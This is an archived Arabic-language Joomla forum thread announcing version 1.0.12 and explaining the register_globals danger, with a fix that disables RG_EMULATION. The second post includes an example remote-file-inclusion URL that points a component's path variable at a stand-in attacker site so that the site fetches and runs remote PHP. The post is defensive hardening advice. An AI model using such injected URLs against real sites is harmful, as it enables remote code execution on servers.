النسخة 1.0.12 الآن

جميع المواضيع السابقة فى القسم العربى قبل تقسيمه

Moderators: sherif, General Support Moderators

Locked
User avatar
dr_drsh
Joomla! Guru
Joomla! Guru
Posts: 585
Joined: Thu Sep 22, 2005 3:52 pm
Location: Egypt
Contact:

النسخة 1.0.12 الآن

Post by dr_drsh » Tue Aug 29, 2006 3:21 pm

بسم الله الرحمن الرحيم

كل عام و أنتم بألف خير
صدرت يوم 25/12/2006 النسخة 1.0.12 لتكون النسخة الأخيرة فى سلسلة جملة! الحالية .

لذلك يجب على من يستخدم نسخة سابقة الترقية فى أقرب وقت لهذه النسخة




بيانات النسخة :

- إصلاح ما يزيد عن 140 خطأ برمجى

- سد ثغرات أمنية منخفضة الخطورة

- التأكد من دقة استعلامات قاعدة البيانات

- دعم SSL switchover

مشاهدة القائمة الكاملة لسجل التغييرات و الإصلاحات




التحميل :

تحميل النسخة القياسية 1.0.12



التعريب :

شهد ملف اللغة عدد من التغييرات لذلك يجب عليك تحميل ملف اللغة و تثبيته من جديد

تحميل ملف التعريب للنسخة 1.0.12

تحميل ملف التعريب للنسخة 1.0.12 ترميز utf-8

طريقة التثبيت //

من لوحة التحكم اذهب إلى
Installers > Languages > و قم باختيار ملف اللغة العربى و رفعه و من ثم تثبيته
بعد ذلك قم بالذهاب إلى
Language Manager > و اختيار اللغة العربية > publish



الترقية :


الترقية من النسخة 1.0.11

الترقية من النسخة 1.0.10

الترقية من النسخة 1.0.9

الترفية من النسخة 1.0.8

الترقية من النسخة 1.0.7

الترفية من النسخة 1.0.6

الترقية من النسخة 1.0.5

الترقية من النسخة 1.0.4

الترقية من النسخة 1.0.3

الترقية من النسخة 1.0.2

الترقية من النسخة 1.0.1

الترقية من النسخة 1.0

طريقة الترقية //


قبل أى شىء ! قم بأخذ نسخة احتياطية من كامل ملفات الموقع بما فى ذلك قاعدة البيانات

قم بتحميل الملف الذى يتناسب مع النسخة التى تعمل عليها الآن , و من ثم فك ضغطه و قم برفع محتواه إلى مجلد جملة! الرئيسى على موقعك , و استبدل الملفات القديمة بالملفات الحديثة



مشاكل ؟  :-*

- المنتدى العربى هنا مفتوح لتساؤلاتكم , نرجو فقط وضع كل موضوع فى القسم المناسب له حتى لا يتم نقله

- إذا اكتشفت أخطاء برميجة فى النسخة الجديدة و كنت تجيد الانجليزية فيمكنك وضعها فى هذا المنتدى


مع خالص الاحترام والتقدير

و الله الموفق
Last edited by emakki on Tue Mar 27, 2007 11:58 pm, edited 1 time in total.
http://mostafa.mosmar.com/blog | My blog
http://mostafa.mosmar.com/jforms | JForms - WYSIWYG Forms Component for J! 1.5 (Beta)

User avatar
dr_drsh
Joomla! Guru
Joomla! Guru
Posts: 585
Joined: Thu Sep 22, 2005 3:52 pm
Location: Egypt
Contact:

النسخة 1.0.12 الآن

Post by dr_drsh » Tue Dec 26, 2006 5:41 am



ٍبسم الله الرحمن الرحيم




مقدمة:


من الاعدادات المستخدمة في الـ php يوجد اعداد يعرف بالـ register_globals.
وظيفته تكمن في التسهيل على المبرمج حيث يقوم بتعريف المتغيرات المدخلة من المستخدم بطريقتي Post و Get في النطاق العام,و هنا تكمن الخطورة , فيما يلي مثال يوضح هذا






مثال:

لنفترض أن هناك تطبيق يسمى X وهذا التطبيق مكتوب بطريقة غير آمنة و يحتوي على السطر التالي

Code: Select all

include  $mosConfig_absolute_path . '/components/com_X/XFile.php' );
كما هو واضح يقوم هذا السطر بادراج ملف الـ php المدعو Xfile.php في التطبيق

لنفترض أن أحدا الأشرار حاول مهاجمة هذا التطبيق باستخدام الـ url التالي

Code: Select all

http:/ /www.example.com/components/com_x/x.php?mosConfig_absolute_path=http://www.badsite.com/bad.php
في حالة وجود الـ register_globals سيقوم الـ php مشكورا بتعريف المنغيير mosConfig_absolute_path في النطاق العام,طبعا المتغيير mosConfig_absolute_path هو اسم متغيير مستعمل من قبل و بالتالي يقوم php بتغيير قيمته الى h t t p://w w w. badsite . com/ bad . php .
و عندما يقوم جملة بتنفيذ السطر

Code: Select all

include  $mosConfig_absolute_path . '/components/com_X/XFile.php' );
تكون نتيجة التعويض

Code: Select all

include  http://www.badsite.com/bad.php. '/components/com_X/XFile.php' );
أي ادراج ملف PHP من موقع آخر و يتم تنفيذ الأوامر التي يحتويها على السرفر الخاص بك و في الأغلب لن تكون أوامر مسالمة






ما موقعنا نحن من هذه المشكلة:

اعدادات جملة الافتراضية تشغل أو تحاكي تشغيل register_globals لانه بالرغم من خطورته الا أن هناك تطبيقات تعتمد عليه "أظن joomlaboard  يعتمد عليه".






الحل:

فتح ملف globals.php وتعديل السطر

Code: Select all

define( 'RG_EMULATION', 1 );
الى

Code: Select all

define( 'RG_EMULATION', 0 );
هذا الحل سيعمل بشكل جيد اذا كنت لا تستعمل تطبيقات تعتمد على هذه الخاصية,أما اذا واجهتك مشاكل بعد تعطيل الـ RG_EMULATION فلا حل الا اعادة تشغيله مرة أخرى و ترقية التطبيقات التي حدثت بها المشاكل الى آخر اصدار "حتى تأمن شر الـ RG " أو الانتقال الى غيرها ان وجدت البدائل.

ملاحظة : ملف الـ globals.php يوجد في المجلد الأساسي لجملة مع الـ index.php واخوانه :)



Last edited by Mohammed on Fri Dec 29, 2006 1:46 pm, edited 1 time in total.
http://mostafa.mosmar.com/blog | My blog
http://mostafa.mosmar.com/jforms | JForms - WYSIWYG Forms Component for J! 1.5 (Beta)


Locked

Return to “الأرشيف”